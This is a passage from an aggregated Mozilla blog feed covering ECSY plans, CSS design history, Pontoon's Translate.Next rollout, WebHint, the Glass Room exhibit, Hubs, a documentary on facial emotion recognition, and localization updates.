  • Performance: We have not yet dug into optimizations in the core; we plan to look into them in the upcoming weeks and will publish some benchmarks and results. The main goal of this initial release was to have an API we like, so that we could then focus on making the core run as fast as possible.
    You may notice that ECSY is not focused on data locality or memory layout as much as many native ECS engines. This has not been a priority in ECSY because in JavaScript we have far less control over the way things are laid out in memory and how our code gets executed on the CPU. We get far bigger wins by preventing unnecessary garbage collection and optimizing for the JIT. This story will change quite a bit with WASM, so it is certainly something we want to explore for ECSY in the future.
  • WASM: We want to try to implement parts of the core or some systems on WASM to take advantage of strict memory layout and parallelism by using WASM threads and SharedArrayBuffers.
  • WebWorkers: We will be working on examples showing how you can move systems to a worker to run them in parallel.

Please feel free to use Github to follow the development, request new features or file issues on bugs you find, our discourse forum to discuss how to use ecsy on your projects, and ecsy.io for more examples and documentation.

hacks.mozilla.orgWhy is CSS So Weird?

CSS is the design language of the web — one of three core web languages — but it also seems to be the most contentious and often perplexing. It’s too easy and too hard, too fragile and too resilient. Love it or hate it, CSS is weird: not quite markup, not quite programming in the common (imperative) sense, and nothing like the design programs we use for print. How did we get here?

I’ve seen some people claim that “CSS is for documents” — as though HTML and JavaScript weren’t also originally for documents. The entire web was for documents, but that hasn’t stopped us from pushing the medium to new extremes. This is a young platform, and all the core languages are growing fast, with CSS advancing leaps and bounds over the last few years.

But there is a real problem: the web is fundamentally device-agnostic, and therefore display-agnostic. The original website from CERN states the problem clearly:

This implies no device-specific markup, or anything which requires control over fonts or colors.

Here we are, putting fonts and colors on the web. But it’s worth taking a step back and asking: what does it even mean to design for an unknown and infinite canvas? This problem isn’t new, it’s not going away, and there are no simple answers – but if we’re going to talk about it, we have to understand the fundamental audacity of the task.

Design on the web will always be weird – but CSS is a living document, and we have the power to keep making it better.

The post Why is CSS So Weird? appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Add-ons BlogFriend of Add-ons: B.J. Herbison

Please meet our newest Friend of Add-ons, B.J. Herbison! B.J. is a longtime Mozillian who joined the add-on content review team for addons.mozilla.org two years ago, where he helps quickly respond to spam submissions and ensures that public listings abide by Mozilla’s Acceptable Use Policy.

A software developer with a knack for finding bugs, B.J. is an avid user of ASan Nightly and is passionate about improving open source software. “The best experience is when I catch a bug in Nightly and it gets fixed before that code ships,” B.J. says. “It doesn’t happen every month, but it happens enough to feel good.”

Following his retirement in 2017, B.J. spends his time working on software and web development programs, volunteering at a local food pantry, and traveling the world with his wife. He also enjoys collecting and studying coins, and playing Dungeons and Dragons. “I’ve played D&D with some of the other players for over forty years, and some other players are under half my age,” B.J. says.

Thank you so much for your contributions to keeping our ecosystem safe and healthy, B.J.!

If you are interested in getting involved with the add-ons community, please take a look at our current contribution opportunities.

hacks.mozilla.orgVideo Shorts from Mozilla Developer

We’re excited to launch a new resource for people who build the web! It will include short videos, articles, demos, and tools that teach web technologies and standards, browser tools, compatibility, and more. No matter your experience level or job description, we’re all working together towards the future health of the web, and Mozilla is here to help.

Today we’re launching a new video channel, with a selection of shorts to kick things off. There are two in our “about:web” series on web technologies, and one in our “Firefox” series on browser tools for web professionals.

Get started with an intro to Dark Mode on the web, by Deja Hodge — and check out her dark mode demo.

Jen Simmons shows us how to access a handy third-panel in the Firefox Developer Tools, and toggle print preview mode.

If you’ve ever struggled to style lists with customized bullets and numbers, Miriam Suzanne has a video all about the ::marker pseudo-element and list counters. Watch the video, and go play with the demo on codepen.

To celebrate the launch, we’ll be releasing new videos every day this week! Check back to learn about several more Firefox tools like Screenshots and the CSS Track Changes panel, and a reflection on what makes CSS so weird. Over the next few months we’ll have new videos weekly (subscribe to the channel!), along with more articles, demos, and some exciting new open source tools.

The post Video Shorts from Mozilla Developer appeared first on Mozilla Hacks - the Web developer blog.

Mozilla L10NHere comes Pontoon’s new Translate application

If you have contributed to Mozilla’s localization in the past few years, chances are high that you have interacted with Pontoon’s translation page. That page is the most important one of the Pontoon web app, as it is where people can create, review and manage translations for most of the products Mozilla makes. Today we are happy to announce that we are soon going to release an entirely re-written version of that page, nicknamed “Translate.Next”. This post shares all the details about this release, and should answer the questions you might have about it.

What is Translate.Next?

Pontoon was started in 2011, and has grown quite a lot since then. Most of the back-end, using Python and Django, has been kept up-to-date and is still doing mostly fine, but the front-end, and specifically the Translate app, is in a terrible shape. Our code has accumulated a lot of technical debt, and is very difficult to maintain and evolve.

After I joined the Pontoon team in the summer of 2017, I spent some time auditing the translate application code, and it quickly became clear to me that a full rewrite would bring a lot of value. Here are some of the benefits this brings:

  1. removing technical debt and making our code saner;
  2. adding better test coverage for our front-end;
  3. enabling the localization of Pontoon, starting with the Translate page;
  4. structurally enabling some of the many improvements our users have been asking for.

Over the last year and a half, Matjaž and myself have been spending a lot of our time working on rewriting the Translate page from scratch, using more recent, better adapted technologies, making our code a lot more modular and maintainable. (If you are interested in knowing more about the technologies we used, it is described in our github repository — there’s some React, redux, Jest and Flow in there. )

How is it different from the current page?

Translate.Next is just the first part of our effort to improve Pontoon’s translation page; the second part will be the functional changes we’ll start working on now. For the time being, though, the translation page should be as close as possible to the current Translate page in terms of features, interface, and usability. We have done our best to reproduce the same layouts and behaviors so that the switch is as transparent as possible for everyone.

However, there are a few things that we decided to change already. The most visible of them is the navigation menu, which now requires fewer clicks to navigate localizable resources thanks to the removal of the infamous Go button.

Here’s what it looks like now:

Pontoon's current Translate navigation bar

And here is what it looks like with Translate.Next:

Pontoon's new Translate navigation bar

The other changes should be fairly inoffensive. We have removed the Tab shortcut in the Editor, as well as support for in-context localization, as it seems both were hardly ever used. It’s also not possible to resize the columns yet, as we have plans to evolve the page layout very soon and the behavior of this feature will change.

If you notice something not mentioned here is different, then it’s very probably a bug, and we would like to hear from you. More on that later in this post!

When will I see the new page?

We intend to do a “rollout” release, meaning that we will turn the feature on for a small percentage of users, and then will increase that number over time until we reach 100%. The users who get to experience the new Translate.Next page will be chosen randomly by a tool we use.
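The post doesn't describe the tool Pontoon uses for this, but the usual mechanism behind a staged rollout can be sketched as follows (a hypothetical illustration): hash each user's identifier into a stable bucket from 0 to 99, and enable the feature when the bucket falls below the current rollout percentage.

```javascript
// Hypothetical sketch of percentage-based rollout bucketing (not Pontoon's
// actual tool): a stable hash keeps each user in the same bucket across visits.
function bucketFor(userId) {
  let hash = 0;
  for (const ch of userId) {
    hash = (hash * 31 + ch.charCodeAt(0)) >>> 0; // simple deterministic string hash
  }
  return hash % 100; // bucket in the range 0-99
}

function isEnabled(userId, rolloutPercent) {
  return bucketFor(userId) < rolloutPercent;
}

// Because buckets are stable, raising the rollout from 10% to 30% to 50% only
// ever adds users; nobody who already has the feature loses it.
console.log(isEnabled("localizer@example.com", 100)); // true
console.log(isEnabled("localizer@example.com", 0));   // false
```

This stability property is what makes the "users who have it keep it" guarantee described above possible without storing per-user state.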

However, we can, and will, add exceptions. Namely, everyone who participated in our last round of testing and has Translate.Next turned on will keep it on. And we can add more exceptions, so if you don’t want to wait for your turn, you can simply contact us (Adrian or Matjaž) with the email address you use to log in to Pontoon, and we’ll give you access.

Note that we will not allow users to opt out, unless there is a very good reason for that. We will take your feedback and categorize it into two buckets: regressions, and the rest. Regressions are big issues that prevent localizers from performing their tasks. They are blockers to advancing Mozilla’s mission and thus we want to take quick action to unblock people if that happens. A regression will very likely mean that we will turn Translate.Next off for everyone until we have fixed it.

Every other issue will be treated as a bug, and we will do our best to solve these in a timely manner, but we kindly ask that you bear with us in the meantime. We do not want to revert everyone back to the old Translate page for a problem that is not blocking you.

The release schedule, barring any regressions, is as follows:

Wednesday, October 2: release to a random 10% of users.
Monday, October 7: release to a random 30% of users.
Wednesday, October 9: release to a random 50% of users.
Monday, October 14: release to all users.

Bugs and regressions found along the way will delay that schedule. We will keep you updated if any such thing happens.

How do I report issues?

If you notice that something works differently than before, or if you find that something is broken, we strongly encourage you to tell us as soon as possible. There are several ways you can do that.

The easiest is to simply add a comment here, below this blog post. Please write a description of your problem, and ideally steps to reproduce it. When commenting, make sure to put a valid email address in the “E-mail” field so that we can reach out to you if we need more details.

If you enjoy using the Mozilla Community discourse forum, you can also describe your issue in the dedicated Translate.Next topic.

And finally, if you are comfortable using Bugzilla, you can go straight there and file a bug.

If you want to check our list of known issues, or follow the status of a reported bug, we keep an updated list on Pontoon’s Wiki page.

Other questions

How do I know I’m using Translate.Next?

There are two ways to know: first, the menu will look a bit different (see above). Second, and probably simpler: there will be a message in the top right corner saying you are using Translate.Next. 🙂

Can I revert back to the old Translate page?

No, once you’re on Translate.Next, the only way to get back to the old Translate page is if we find a critical regression and revert everyone. We cannot revert individuals to the old page.

Can I opt-in to Translate.Next?

Yes, absolutely. Just contact us (Adrian or Matjaž) to say you want in, and give us the email address you use to log in to Pontoon.

Let’s release!

Thank you for helping with this release. We hope you will enjoy the new Translate page, and all the cool changes we will be able to make in the future thanks to that. And keep an eye out for the new page to show up on your Pontoon. 😉

hacks.mozilla.orgWebHint in Firefox DevTools: Improve Compatibility, Accessibility and more

Creating experiences that look and work great across different browsers is one of the biggest challenges on the web. It also is the most rewarding part, as it gets your app to as many users as possible. On the other hand, cross-browser compatibility is also the web’s biggest frustration. Testing legacy browsers late in the development process can break a feature that you spent hours on, even requiring rewrites to fix.

What if the tools in your primary development browser could warn you sooner? Thanks to Webhint in Firefox DevTools, we can do exactly that, and more.

The Webhint engine

Webhint provides feedback about your site’s compatibility, performance, security, and accessibility to guide improvements. A key benefit is integration across the development cycle — while you author in VS Code, test in CI/CD automation, or benchmark sites in the online scanner. Having Webhint available in DevTools adds in-page context and inspection capabilities.

Firefox playing Chromium-frisbee with Narwhal Nelli, for real!

Firefox DevTools was happy to collaborate with the Webhint team, which just released version 1.0 of their extension. With the recommendations that the DevTools panel provides, developers on any browser (there is also a Chrome extension) can spend less time looking up cross-browser compatibility tables like caniuse or MDN. The cross-browser guidance for CSS and HTML, a core part of the 1.0 release, is also one of the first projects to apply MDN’s browser-compat-data to detect compatibility issues in code.

The foundation to build on

The hints are not rules written in stone. In fact, the hint engine is extensible by design so developers can capture their own expertise and best practices for their projects. We also have plans to tweak the heuristics behind recommendations, especially for new ground like compatibility, based on your feedback. We are also working to integrate recommendations further into DevTools. Everything should be at your fingertips when you need it.

Wrapping up

Install Webhint for Firefox, Chrome or Edge (Chromium) and run it against your old and new projects. Find out how you could further optimize compatibility, security, accessibility, and speed. We hope it will help you to make your site work for as many users as possible.

The post WebHint in Firefox DevTools: Improve Compatibility, Accessibility and more appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogFirefox and Tactical Tech Bring The Glass Room to San Francisco

After welcoming more than 30,000 visitors in Berlin, New York, and London, The Glass Room is coming to San Francisco on October 16, 2019.

From the tech boom to techlash, our favorite technologies have become intertwined with our daily lives. As technology is embedded in everything from dating to driving and from the environment to elections, our desire for convenience has given way to trade-offs for our privacy, security, and wellbeing. 

The Glass Room, curated by Tactical Tech and produced by Firefox, is a place to explore how technology and data are shaping our perceptions, experiences, and understanding of the world. The most connected generation in history is also the most exposed, as people’s privacy becomes the fuel for technology’s incredible growth. What’s gained and lost — and who decides — are explored at the Glass Room.

The Glass Room is in a 28,000 square-foot former retail store, located at 838 Market Street, across from Westfield San Francisco Centre, in the heart of the Union Square Retail District. It will be open to the public from October 16th through November 3rd. The location is intentional, meant to entice shoppers into the store and help them leave better equipped to make informed choices about technology and how it impacts their personal data, privacy, and security.

The Glass Room is a pop-up store with a twist, presenting more than 50 provocative tech products in an unexpected environment. This installment arrives in San Francisco to turn a mirror on Silicon Valley, to the people who make our technologies and those who are affected by its impact on society. “The biggest change since we launched The Glass Room in New York in 2016 and in London in 2017 is that the overall mood of tech users and consumers has shifted,” says Stephanie Hankey, of Tactical Tech. “People are starting to question how things work, how it affects them and what they can do about it. The Glass Room is a great way for users of technology to engage on a deeper level and make more informed choices. Each piece in The Glass Room tells a different story about data and technology, so there is something for everyone to connect with.”

This interactive public exhibit also includes a Data Detox Bar, where a team of in-house experts called Ingeniuses will dispense practical tips, tricks, and advice. There will also be a program of talks and workshops to foster debate, discussion, and solution-finding.

“We build the family of Firefox products to help people take charge of their data online, and give them control with features and tools that put privacy first,” says Mary Ellen Muckerman, Vice President of Brand Engagement. “We know it’s our job to help people understand what’s happening behind the scenes of the technology they love and we hope that events like The Glass Room help inform people about how to protect themselves online.”

At this turning point in the age of wider technological advancement, The Glass Room marks a moment to reflect on what our next steps should be. How do we want to shape our relationship with technology in the future?

More Details

October 16th – November 3rd 2019
838 Market Street, San Francisco
12pm–8pm daily
Free and open to the public



The post Firefox and Tactical Tech Bring The Glass Room to San Francisco appeared first on The Mozilla Blog.

Open Policy & AdvocacyCharting a new course for tech competition

As the internet has become more and more centralized, more opportunity for anticompetitive gatekeeping behavior has arisen. Yet competition and antitrust law have struggled to keep up, and all around the world, governments are reviewing their legal frameworks to consider what they can do.

Today, Mozilla released a working paper discussing the unique characteristics of digital platforms in the context of competition, and offering a new framework for future-proof competition policy for the internet. Charting a course distinct from both the status quo and pure structural reform, this paper proposes stronger single-firm conduct enforcement to capture a modern set of harmful gatekeeping behaviors by powerful firms; tougher merger review, particularly for vertical mergers, to weigh the full spectrum of potential competitive harm; and faster agency processes that can be responsive within the rapid market cycles of tech. And across all competition policy making and enforcement, this paper proposes that standards and interoperability be at the center.

The internet’s unique formula for innovation and productive disruption depends on market entry and growth, which are put at risk as centralized access to data and networks becomes more and more of an insurmountable advantage. But we can see a light at the end of the silo, if legislators and competition authorities embrace their duty to internet users and modernize their legal and policy frameworks to respond to today’s challenges and to protect the core of what has made the internet such a powerful engine for socioeconomic benefit.

The post Charting a new course for tech competition appeared first on Open Policy & Advocacy.

QMOFirefox 70 Beta 10 Testday, September 27th

Hello Mozillians,

We are happy to let you know that on Friday, September 27th, we are organizing the Firefox 70 Beta 10 Testday. We’ll be focusing our testing on: Password Manager.

Check out the detailed instructions via this gdoc.

*Note that these events are no longer held on Etherpad docs since public.etherpad-mozilla.org was disabled.

No previous testing experience is required, so feel free to join us on #qa IRC channel where our moderators will offer you guidance and answer your questions.

Join us and help us make Firefox better!

See you on Friday!

Mozilla Add-ons BlogCommunity Involvement in Recommended Extensions

In July we launched the Recommended Extensions program, which entailed a complete reboot of our editorial process on addons.mozilla.org (AMO). Previously we placed a priority on regularly featuring new extensions to explore. With the Recommended program, we’ve shifted our focus to editorially vetting and monitoring a fairly fixed collection of high-quality extensions.

For years community contributors on the Featured Extensions Board played a big role in selecting AMO’s monthly curated content. We intend to maintain a community project aligned with the new Recommended program. We’re in the process now of reshaping the project to be known as the Recommended Extensions Community Board. As before, the board will be comprised of contributors who possess a keen passion for, and expertise of, browser extensions. Board membership will rotate every six months.

The add-ons team is currently assembling the first Recommended Extensions Community Board. To help shape the foundation of this project, we’re aiming to fill the debut board with some of our most prolific past editorial contributors. In general, the Recommended Extensions Community Board will focus on:

  • Ongoing evaluation of current Recommended extensions. All Recommended extensions are under active development. As such, contributors will participate in ongoing re-evaluations to ensure the curated list maintains a high overall quality standard.
  • Evaluating new submissions. As mentioned above, we do not anticipate significant amounts of churn on the Recommended list. That said, Firefox users want the latest and greatest extensions available, so the board will also play a role in evaluating new candidate submissions.
  • Special projects. Each board will also focus on a special project or two. For instance, we may closely examine a specific type of content within the Recommended list (e.g. let’s look at all of the Recommended bookmark managers; is this the strongest collection of bookmark managers we can compile?)

Future boards (rotating every six months) will have an open enrollment process. When the time arrives to form the next board, we’ll post information on the application process here on this blog and our other communication channels.

If you are interested in exploring the current curated list, here are all Recommended extensions.

The post Community Involvement in Recommended Extensions appeared first on Mozilla Add-ons Blog.

hacks.mozilla.orgExploring Collaboration and Communication with Mozilla Hubs

In April last year, Mozilla introduced Hubs, an immersive social experience that brings users together in shared 3D spaces. Hubs runs in the browser on mobile, desktop, and virtual reality devices. Since its initial release, the platform has undergone extensive development work to better enable communities and creators to embrace the opportunities that online collaborative environments have to offer. As a result, we’ve seen increased adoption of Hubs and new use cases have emerged.

The ability to connect to anyone around the world is a powerful tool available to us through the internet. As we look at advancements in mixed reality like the WebXR API, we are able to explore ways to feel more present with others through technology. One area where virtual reality shows considerable promise is in supporting distributed teams.

Mozilla is no stranger to remote collaboration. 46% of our employees work from home and the ten company offices span seven countries across six time zones. Because of this, we’re excited about finding opportunities to improve the ways we connect with our community of contributors and volunteers. Remote work and collaboration is a core part of how we connect to each other through the web.

Four avatars in Hubs stand around a white board in a shared 3D space. The whiteboard has a chart in the background.

Communication and Identity

Hubs is built on top of WebRTC and supports real-time conversations between users in a shared environment. Users embody avatars, 3D models in the glTF format, which they control with the WASD keys or through the application’s teleportation controls. Because these avatars ground users in a shared space, people can interact naturally. Spatial audio means that you can break off into small groups and have conversations, with your voice broadcast based on your position relative to others in the room. Similarly, supporting both spoken and text chat between users allows for multiple forms of communication, which can provide more equitable participation than other online conferencing platforms.
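Browsers expose this kind of positional attenuation through the Web Audio API’s PannerNode. As a rough sketch of the math involved, the default “inverse” distance model reduces a source’s gain as the listener moves away from it. The parameter names and defaults below mirror the PannerNode attributes; this is only an illustration, not Hubs’ actual audio code:

```javascript
// Distance-based attenuation as in the Web Audio API's PannerNode
// "inverse" distance model (the browser default). Parameter names and
// default values mirror the PannerNode attributes; this is only an
// illustration of the underlying math, not Hubs' actual audio code.
function inverseDistanceGain(distance, refDistance = 1, rolloffFactor = 1) {
  // Below refDistance the spec clamps the distance, so gain never exceeds 1.
  const d = Math.max(distance, refDistance);
  return refDistance / (refDistance + rolloffFactor * (d - refDistance));
}

// A speaker right next to you is heard at full volume...
console.log(inverseDistanceGain(1)); // 1
// ...while one a few meters away is much quieter.
console.log(inverseDistanceGain(5)); // 0.2
```

In a real scene the browser evaluates this per audio source, using the positions of the panner and the listener, which is what lets a huddle across the room fade into the background.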

Video conversations can be a powerful form of communication between trusted parties, but there are times when you don’t want to share a video stream with a group of people. Establishing trust with other people online takes time. With Hubs, preserving privacy is integral to the platform’s shared 3D spaces. This applies to how you look in Hubs, too. Over the past few months, the Hubs team has released a set of customization capabilities for avatars. These allow creators and users to find more ways to represent themselves within the rooms they participate in. Avatars can be easily modified and customized on the Hubs website or with 3D modeling tools. Offering flexible options for a user’s identity within an online social platform is a core component of online safety, which you can read more about in the Mozilla Reality blog post here.

Customization and Collaboration

In addition to new avatar features, we also launched an online 3D editor called Spoke. Spoke can be used to create scenes for Hubs rooms. This allows users to compose spaces using 3D models and traditional web content like videos, images, gifs, and PDFs. Spoke environments can truly transform a space and make it a unique place for communities and organizations to meet. Scenes can also be listed as remixable. Other Hubs users can then use these scenes as templates for their own content. In the coming weeks, we’ll also add the ability to create themed kits for Spoke.

Different web content providers power the Create menu in Hubs so users can bring in their own media to share. This can include images, models, and videos found on the web or their own files. Through the Create menu, anyone can create and share documents and objects in an easy, collaborative manner. Users can also share their webcam or share their computer screen with their rooms.

Supporting Communities and Organizations

Throughout the past year, we’ve heard some inspiring stories about how individuals, communities, and organizations are using Hubs to strengthen their missions and stay connected. Communities are powerful ecosystems, and we did a sprint this past year to build out additional integrations and keep users connected with their friends more easily. We have recently also built new community management tools for events.

In addition to new community management tools, we’ve begun work on a new set of tools built around the core infrastructure powering hubs.mozilla.com. These will allow anyone to stand up a self-hosted version of the platform for their own use, including the ability to add custom branding and to host rooms through a company-provided domain.

Join the Hubs Community

If you’re interested in Hubs and bringing 3D content to the web, try it out and share your feedback! The code powering Hubs is available online on GitHub under the MPL (Mozilla Public License) and we welcome contributions from the community. Join the Hubs Discord Server or follow Hubs on Twitter to connect with the team. You can also participate in our virtual events to learn more.


The post Exploring Collaboration and Communication with Mozilla Hubs appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogIntroducing ‘Stealing Ur Feelings,’ an Interactive Documentary About Big Tech, AI, and You

‘Stealing Ur Feelings’ uses dark humor to expose how Snapchat, Instagram, and Facebook can use AI to profit off users’ faces and emotions


An augmented reality film revealing how the most popular apps can use facial emotion recognition technology to make decisions about your life, promote inequalities, and even destabilize democracy makes its worldwide debut on the web today. Using the same AI technology described in corporate patents, “Stealing Ur Feelings,” by Noah Levenson, learns viewers’ deepest secrets just by analyzing their faces in real time as they watch the film.

Watch https://stealingurfeelin.gs/

Viewer scorecard from ‘Stealing Ur Feelings’

The six-minute documentary explains the science of facial emotion recognition technology and demystifies how the software picks out features like your eyes and mouth to understand if you’re happy, sad, angry, or disgusted. While it is not confirmed whether big tech companies have started using this AI, “Stealing Ur Feelings” explores its potential applications, including a Snapchat patent titled “Determining a mood for a group.” The diagrams from the patent show Snapchat using smartphone cameras to analyze and rate users’ expressions and emotions at concerts, debates, and even a parade.

The documentary was made possible through a $50,000 Creative Media Award from Mozilla. The Creative Media Awards reflect Mozilla’s commitment to partner with artists to engage the public in exploring and understanding complex technical issues, such as the potential pitfalls of AI in dating apps (Monster Match) and the hiring process (Survival of the Best Fit).

“Stealing Ur Feelings” is debuting online alongside a petition from Mozilla to Snapchat. At the end of the film, viewers are asked to smile at the camera if they would like to sign a petition demanding that Snapchat publicly disclose whether or not it is already using facial emotion recognition technology in its app. Once the camera detects a smile, the viewer is taken to a Mozilla petition, which they can read and sign.

The documentary also generates a downloadable scorecard featuring a photo of the viewer with Snapchat-like filters and lenses. The unique image reveals some tongue-in-cheek assumptions that the AI makes about the viewer while watching the film. These include the viewer’s IQ, annual income, and how much they like pizza and Kanye West.

“Stealing Ur Feelings” has screened at several distinguished film festivals and exhibits in recent months, including the Tribeca Film Festival, Open City Documentary Festival, Camden International Film Festival, and the Tate Modern. Later this year, the film will screen at Tactical Tech’s Glass Room installation in San Francisco. The film has already been inducted into MIT’s prestigious docubase and praised by the Museum of the Moving Image.

“Facial recognition is the perfect tool to extract even more data from us, all the time, everywhere — even when we’re not scrolling, typing, or clicking,” said Noah Levenson, the New York-based artist and engineer who created “Stealing Ur Feelings.” “Set against the backdrop of Cambridge Analytica and the digital privacy scandals rocking today’s news, I wanted to create a fast, darkly funny, dizzying unveiling of the ‘fun secret feature’ lurking behind our selfies.” Levenson was recently named a Rockefeller Foundation Bellagio Resident Fellow on artificial intelligence.

“Artificial intelligence is increasingly interwoven into our everyday lives,” said Mark Surman, Mozilla’s Executive Director. “Mozilla’s Creative Media Awards seek to raise awareness about the potential of AI, and ensure the technology is used in a way that makes our lives better rather than worse.”

The post Introducing ‘Stealing Ur Feelings,’ an Interactive Documentary About Big Tech, AI, and You appeared first on The Mozilla Blog.

Mozilla L10NL10n Report: September Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 


New localizers

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New community/locales added

New content and projects

What’s new or coming up in Firefox desktop

As anticipated in the previous edition of the L10N Report, Firefox 70 is going to be a large release, introducing new features and several improvements around Tracking Protection, privacy and security. The deadline to ship any updates in Firefox 70 is October 8. Make sure to test your localization before the deadline, focusing on:

  • about:protections
  • about:logins
  • Privacy preferences and protection panel (the panel displayed when you click on the shield icon in the address bar)

Also be mindful of a few last-minute changes that were introduced in Beta to allow for better localization.

If your localization is missing several strings and you don’t know where to start from, don’t forget that you can use Tags in Pontoon to focus on high priority content first (example).

Upcoming changes to the release cycle

The current version of the rapid release cycle allows for cycles of different lengths, ranging from 6 to 8 weeks. Over two years ago we moved to localizing Nightly by default. Assuming an average 6-week cycle for the sake of simplicity:

  • New strings are available for localization a few days after landing in mozilla-central and showing up in Nightly (they spend some time in a quarantine repository, to avoid exposing localizers to unclear content).
  • Depending on when a string lands within the cycle, you’d have up to 6 weeks to localize before it moves to Beta. In the worst case scenario, a string could land at the very end of the cycle, and will need to be translated after that version of Firefox moves to Beta.
  • Once it moves to Beta, you still have almost a full cycle (4.5 weeks) to localize. Ideally, this time should be spent fine-tuning and testing the localization rather than catching up on missing strings.

A few days ago it was announced that Firefox is progressively moving to a 4-weeks release cycle. If you’re focusing your localization on Nightly, this should have a relatively small impact on your work:

  • In Nightly, you’d have up to 4 weeks to localize content before it moves to Beta.
  • In Beta, you’d have up to 2.5 weeks to localize.

The cycles will shorten progressively, stabilizing at 4 weeks around April 2020. Firefox 75 will be the first release with a 4-week cycle in both Nightly and Beta.

While this shortens the time available for localization, it also means that the schedule becomes predictable and, more importantly, localization updates can ship faster: if you fix something in Beta today, it could take up to 8 weeks to ship in release. With the new cycle, it will always take a maximum of 4 weeks.
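For illustration only, here is a small sketch of the localization windows implied by the figures above. The ~1.5-week offset between the cycle length and the Beta window is inferred from the two data points given in this post (6-week cycle → 4.5 weeks, 4-week cycle → 2.5 weeks); it is not an official number:

```javascript
// Localization windows for a string that lands at the start of a cycle,
// using the figures from this post. The ~1.5-week gap between cycle
// length and the Beta window is inferred from the two data points given
// (6 -> 4.5 weeks, 4 -> 2.5 weeks); it is not an official number.
function localizationWindows(cycleWeeks) {
  return {
    nightlyWeeks: cycleWeeks,    // up to a full cycle before Beta
    betaWeeks: cycleWeeks - 1.5, // time left once the string is in Beta
  };
}

console.log(localizationWindows(6)); // { nightlyWeeks: 6, betaWeeks: 4.5 }
console.log(localizationWindows(4)); // { nightlyWeeks: 4, betaWeeks: 2.5 }
```

The trade-off is visible in the numbers: each individual window shrinks, but because a full cycle is shorter, a translation landed today reaches release users sooner.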

What’s new or coming up in web projects

Firefox Accounts

A lot more strings have landed since the last report. Please allocate time accordingly after finishing other higher-priority projects. An updated deadline will be added to Pontoon in the coming days, to ensure localized content is in production as part of the October launch.


A few pages have been added recently, and more will be added in the coming weeks to support the major release in October. Most of the pages will be enabled only in the de, en-CA, en-GB, and fr locales, and some can be opted into. Please note that Mozilla staff editors will be localizing the pages in German and French.

Legal documentation

We have quite a few updates in legal documentation. If your community is interested in reviewing any of the following, please adhere to this process: All change requests will be done through pull requests on GitHub. With a few exceptions, all the suggested changes should go through a peer review for approval before the changes go to production.

MDN & SuMo

Due to the recent merge into a single Bengali locale on the product side, the articles were consolidated as well. For overlapping articles, the versions kept were selected based on criteria such as article completeness and date of completion.

What’s new or coming up in SuMo

Newly published articles for Fire TV:

Newly published articles for Preview:

Newly published articles for Firefox for iOS:

Improving TM matching of Fluent strings

Translation Memory (TM) matching has been improved by changing the way we store Fluent strings in our TM. Instead of storing full messages (together with their IDs and other syntax elements), we now store text only. Obviously, that increases the number of results shown in the Machinery tab, and also makes our TMX exports more usable. Thanks to Jordi Serratosa for driving this effort forward! As part of the fix, we also discovered and fixed bug 1578155, which further improves TM matching for all file formats.
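As a rough illustration of the change (not Pontoon’s actual implementation, which uses the fluent.syntax parser), stripping a Fluent message down to its text values might look like this; the message shown is a made-up example in Fluent syntax:

```javascript
// Extract only the text values from a simple Fluent message, dropping the
// message ID and attribute names. Pontoon does this with the fluent.syntax
// parser; this regex-based version is a simplification that only handles
// single-line "id = value" and ".attr = value" lines.
function fluentTextValues(message) {
  const values = [];
  for (const line of message.split('\n')) {
    // Matches both "message-id = text" and indented ".attribute = text".
    const m = line.match(/^\s*\.?[\w-]+\s*=\s*(.+)$/);
    if (m) values.push(m[1].trim());
  }
  return values;
}

// A made-up example message with one attribute:
const message = [
  'menu-quit = Quit',
  '    .accesskey = Q',
].join('\n');

// Only the translatable text would be stored in the TM:
console.log(fluentTextValues(message)); // [ 'Quit', 'Q' ]
```

Storing only the text means a match in the Machinery tab no longer depends on two strings sharing the same message ID or attribute structure.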

Faster saving of translations

As part of fixing bug 1578057, Michal Stanke discovered a potential speedup when saving translations. Specifically, improving the way we update the latest-activity column in dashboards resulted in a noticeable 10–20% speedup when saving a translation. That’s a huge win for an operation that happens around 2,000 times every day. Well done, Michal!

Useful Links

Questions? Want to get involved?

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Mozilla VR BlogVirtual identities in Hubs

Virtual identities in Hubs

Identity is a complicated concept—who are we really? Most of us have government IDs that define part of our identity, but that’s just a starting point. We present ourselves differently depending on context—who we are with our loved ones might not be the same as who we are at work, but both are legitimate representations of ourselves.

Virtual spaces make this even harder. We might maintain many virtual identities with different degrees of overlap. Having control over our representation and identity online is a critical component of safety and privacy, and platforms should prioritize user agency.

More importantly, autonomy and privacy are intrinsically intertwined. If everyone saw my Google searches, I would probably change what I search for. If I knew my employer could monitor my interactions when I’m not at work, I would behave differently. Privacy isn’t just about protecting information about myself; it’s about allowing me to express myself.


Avatars are a digital representation of individuals. They enable virtual embodiment, making communication in a virtual environment more natural and analogous to communication in real life. They also help us ground ourselves spatially in the 3D environment and allow others to have a specific point to reference, which enables directional sentiment and simulated eye contact.

Your decisions about avatar representation can both reveal personally identifiable information about you, such as your face, and affect your self-perception and behavior. The latter phenomenon is known as the Proteus Effect, and it can reinforce societal biases: people tend to feel more confident when embodying taller avatars, for example.

When applying concepts of identity to social VR, platforms like Hubs need to design and implement features that let users easily manage their identities. On the avatar side, that means making it really easy to choose, change, and customize avatars, so that you decide how much or how little they represent you.

In Hubs, we chose robots as the default avatar instead of picking a single human representation. However, any glTF binary (.glb) file can be used as the base avatar form; it was important to us that the platform support any number of avatar styles, driven by the communities and users themselves. That means if you prefer cats or pinecones, you have the flexibility to choose that representation for yourself instead.

When it comes to determining visual identity of one’s self in a 3D space, that control should belong to the user, not the platform.


When you interact with others online, there is a risk of exposing different parts of your identity to them, and it isn’t always clear what is exposed when you create an account on a website. Your profile on a social network, for example, may share an image of you with other people, display your legal name, or show an account pseudonym that you use with other online services.

Hubs allows you to use the platform regardless of whether or not you have an account, but one of the benefits of account-based services is the ability to have a known identity that can be responsible for certain actions and behaviors. Certain actions, like being promoted to a room moderator, require an account. A challenge with pseudonymous and anonymous spaces is that a lack of a valued account can also result in a lack of accountability.

Hubs accounts are purposely lightweight, requiring only an email address. Being able to tie your virtual identity to a second account, such as a Discord account, can provide further benefits, such as increased room security and the ability to communicate across different platforms. Particularly when room links are widely distributed, room dynamics can benefit from linking users to a known identity, but platforms should respect how much information they request from users.

